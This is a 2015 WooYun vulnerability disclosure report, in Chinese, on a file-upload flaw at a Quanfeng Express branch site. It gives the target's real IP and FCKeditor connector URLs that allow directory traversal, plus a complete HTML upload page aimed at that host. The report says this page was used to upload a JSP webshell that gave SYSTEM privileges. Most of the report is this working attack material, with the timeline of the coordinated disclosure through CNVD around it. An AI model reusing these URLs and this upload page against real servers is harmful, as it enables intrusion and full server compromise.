当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103604

漏洞标题:全峰快递某分站上传漏洞

相关厂商:全峰快递

漏洞作者: j2ck3r

提交时间:2015-03-25 11:59

修复时间:2015-05-14 08:40

公开时间:2015-05-14 08:40

漏洞类型:文件上传导致任意代码执行

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-25: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经确认,细节仅向厂商公开
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

全峰快递某分站上传漏洞

详细说明:

全峰快递某分站上传漏洞

漏洞证明:

http://122.225.104.50:8080/templates/index/hrlogon.jsp

1.jpg


扫描目录发现有FCKeditor
http://122.225.104.50:8080/fckeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/

2.jpg


目录可以任意遍历
http://122.225.104.50:8080/fckeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../

3.jpg


本地构造上传文件

<!--
 * FCKeditor - The text editor for internet
 * Copyright (C) 2003-2006 Frederico Caldeira Knabben
 * 
 * Licensed under the terms of the GNU Lesser General Public License:
 * 		http://www.opensource.org/licenses/lgpl-license.php
 * 
 * For further information visit:
 * 		http://www.fckeditor.net/
 * 
 * "Support Open Source software. What about a donation today?"
 * 
 * File Name: test.html
 * 	Test page for the File Browser connectors.
 * 
 * File Authors:
 * 		Frederico Caldeira Knabben (fredck@fckeditor.net)
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<title>FCKeditor - Connectors Tests</title>
	<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5" />
	<script type="text/javascript">
function BuildBaseUrl( command )
{
	var sUrl =  
		document.getElementById('cmbConnector').value +
		'?Command=' + command +
		'&Type=' + document.getElementById('cmbType').value +
		'&CurrentFolder=' + document.getElementById('txtFolder').value ;
	
	return sUrl ;
}
function SetFrameUrl( url )
{
	if ( document.all )
		eRunningFrame.document.location = url ;
	else
		document.getElementById('eRunningFrame').src = url ;
		
	document.getElementById('eUrl').innerHTML = url ;
}
function GetFolders()
{	
	SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;
	return false ;
}
function GetFoldersAndFiles()
{
	SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;
	return false ;
}
function CreateFolder()
{
	var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;
	
	if ( ! sFolder )
		return ;
	
	var sUrl = BuildBaseUrl( 'CreateFolder' ) ;
	sUrl += '&NewFolderName=' + escape( sFolder ) ;
	SetFrameUrl( sUrl ) ;
	return false ;
}
function OnUploadCompleted( errorNumber, fileName )
{
	switch ( errorNumber )
	{
		case 0 :
			alert( 'File uploaded with no errors' ) ;
			break ;
		case 201 :
			GetFoldersAndFiles()
			alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
			break ;
		case 202 :
			alert( 'Invalid file' ) ;
			break ;
		default :
			alert( 'Error on file upload. Error number: ' + errorNumber ) ;
			break ;
	}
}
this.frames.frmUpload = this ;
function SetAction()
{
	var sUrl = BuildBaseUrl( 'FileUpload' ) ;
	document.getElementById('eUrl').innerHTML = sUrl ;
	document.getElementById('frmUpload').action = sUrl ;
}
	</script>
</head>
<body>
	<table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0">
		<tr>
			<td>
				<table cellspacing="0" cellpadding="0" border="0">
					<tr>
						<td>
							Connector:<br />
							<select id="cmbConnector" name="cmbConnector">
								<option value="asp/connector.asp" selected="selected">ASP</option>
								<option value="http://122.225.104.50:8080/fckeditor//editor/filemanager/browser/default/connectors/jsp/connector">ASP.Net</option>
								<option value="cfm/connector.cfm">ColdFusion</option>
								<option value="lasso/connector.lasso">Lasso</option>
								<option value="perl/connector.cgi">Perl</option>
								<option value="php/connector.php">PHP</option>
								<option value="py/connector.py">Python</option>
							</select>
						</td>
						<td>
							&nbsp;&nbsp;&nbsp;</td>
						<td>
							Current Folder<br />
							<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
						<td>
							&nbsp;&nbsp;&nbsp;</td>
						<td>
							Resource Type<br />
							<select id="cmbType" name="cmbType">
								<option value="File" selected="selected">File</option>
								<option value="Image">Image</option>
								<option value="Flash">Flash</option>
								<option value="Media">Media</option>
								<option value="Invalid">Invalid Type (for testing)</option>
							</select>
						</td>
					</tr>
				</table>
				<br />
				<table cellspacing="0" cellpadding="0" border="0">
					<tr>
						<td valign="top">
							<a href="#" onclick="GetFolders();">Get Folders</a></td>
						<td>
							&nbsp;&nbsp;&nbsp;</td>
						<td valign="top">
							<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
						<td>
							&nbsp;&nbsp;&nbsp;</td>
						<td valign="top">
							<a href="#" onclick="CreateFolder();">Create Folder</a></td>
						<td>
							&nbsp;&nbsp;&nbsp;</td>
						<td valign="top">
							<form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data">
								File Upload<br />
								<input id="txtFileUpload" type="file" name="NewFile" />
								<input type="submit" value="Upload" onclick="SetAction();" />
							</form>
						</td>
					</tr>
				</table>
				<br />
				URL: <span id="eUrl"></span>
			</td>
		</tr>
		<tr>
			<td height="100%" valign="top">
				<iframe id="eRunningFrame" src="../../../../fckblank.html" name="eRunningFrame" width="100%"
					height="100%"></iframe>
			</td>
		</tr>
	</table>
</body>
</html>


4.jpg


上传JSP木马成功

5.jpg


WIN2003系统 直接就是SYSTEM的权限

修复方案:

你们懂得~~

版权声明:转载请注明来源 j2ck3r@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-30 08:39

厂商回复:

CNVD确认并复现所述情况,,由CNVD按以往尝试的公开渠道向网站管理单位通报.

最新状态:

暂无